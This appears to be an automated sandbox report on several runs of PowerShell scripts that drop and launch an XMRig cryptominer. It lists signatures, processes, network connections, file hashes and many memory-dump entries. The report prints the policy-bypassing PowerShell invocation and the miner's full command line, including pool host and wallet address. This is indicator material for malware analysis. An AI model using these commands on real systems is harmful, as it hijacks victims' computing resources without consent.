memory/2292-110-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-111-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-112-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-113-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-114-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-115-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-116-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

memory/2292-117-0x00007FF7B3C50000-0x00007FF7B4883000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:03

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1276 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5032,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

memory/1624-0-0x00007FF94B923000-0x00007FF94B925000-memory.dmp

memory/1624-1-0x0000012622E30000-0x0000012622E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iculwlv4.gso.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1624-11-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-12-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-14-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-15-0x00000126231C0000-0x00000126231D2000-memory.dmp

memory/1624-16-0x00000126231A0000-0x00000126231AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3540-47-0x000002899C000000-0x000002899C020000-memory.dmp

memory/3540-48-0x000002899D760000-0x000002899D780000-memory.dmp

memory/3540-49-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-50-0x000002899D780000-0x000002899D7A0000-memory.dmp

memory/3540-51-0x000002899D7A0000-0x000002899D7C0000-memory.dmp

memory/1624-53-0x00007FF94B923000-0x00007FF94B925000-memory.dmp

memory/3540-52-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/1624-54-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/1624-56-0x00007FF94B920000-0x00007FF94C3E1000-memory.dmp

memory/3540-55-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-57-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-59-0x000002899D7A0000-0x000002899D7C0000-memory.dmp

memory/3540-58-0x000002899D780000-0x000002899D7A0000-memory.dmp

memory/3540-60-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-61-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-62-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-63-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-64-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-65-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-66-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-67-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-68-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-69-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-70-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-71-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-72-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-73-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-74-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-75-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-76-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-77-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-78-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-79-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-80-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-81-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-82-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-83-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-84-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-85-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-86-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-87-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-88-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-89-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-90-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-91-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-92-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-93-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-94-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-95-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-96-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-97-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-98-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-99-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-100-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-101-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-102-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-103-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-104-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-105-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-106-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-107-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-108-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-109-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-110-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-111-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-112-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-113-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-114-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-115-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-116-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-117-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

memory/3540-118-0x00007FF623FA0000-0x00007FF624BD3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win10v2004-20240611-en

Max time kernel

1789s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
GB 184.28.176.90:443 www.bing.com tcp
US 8.8.8.8:53 90.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp

Files

memory/1108-0-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuz0jgmb.coh.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1108-6-0x0000025D74D10000-0x0000025D74D32000-memory.dmp

memory/1108-11-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-12-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-14-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/1108-15-0x0000025D75AE0000-0x0000025D75AF2000-memory.dmp

memory/1108-16-0x0000025D74D60000-0x0000025D74D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3728-47-0x000001C21CC30000-0x000001C21CC50000-memory.dmp

memory/3728-48-0x000001C21E430000-0x000001C21E450000-memory.dmp

memory/3728-49-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/1108-50-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/3728-51-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-53-0x000001C21E450000-0x000001C21E470000-memory.dmp

memory/1108-52-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp

memory/3728-54-0x000001C21E470000-0x000001C21E490000-memory.dmp

memory/1108-55-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp

memory/3728-56-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-58-0x000001C21E450000-0x000001C21E470000-memory.dmp

memory/3728-57-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-59-0x000001C21E470000-0x000001C21E490000-memory.dmp

memory/3728-60-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-61-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-62-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-63-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-64-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-65-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-66-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-67-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-68-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-69-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-70-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-71-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-72-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-73-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-74-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-75-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-76-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-77-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-78-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-79-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-80-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-81-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-82-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-83-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-84-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-85-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-86-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-87-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-88-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-89-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-90-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-91-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-92-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-93-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-94-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-95-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-96-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-97-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-98-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-99-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-100-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-101-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-102-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-103-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-104-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-105-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-106-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-107-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-108-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-109-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-110-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-111-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-112-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-113-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-114-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-115-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-116-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-117-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

memory/3728-118-0x00007FF75A100000-0x00007FF75AD33000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:26

Platform

win11-20240611-en

Max time kernel

1794s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp

Files

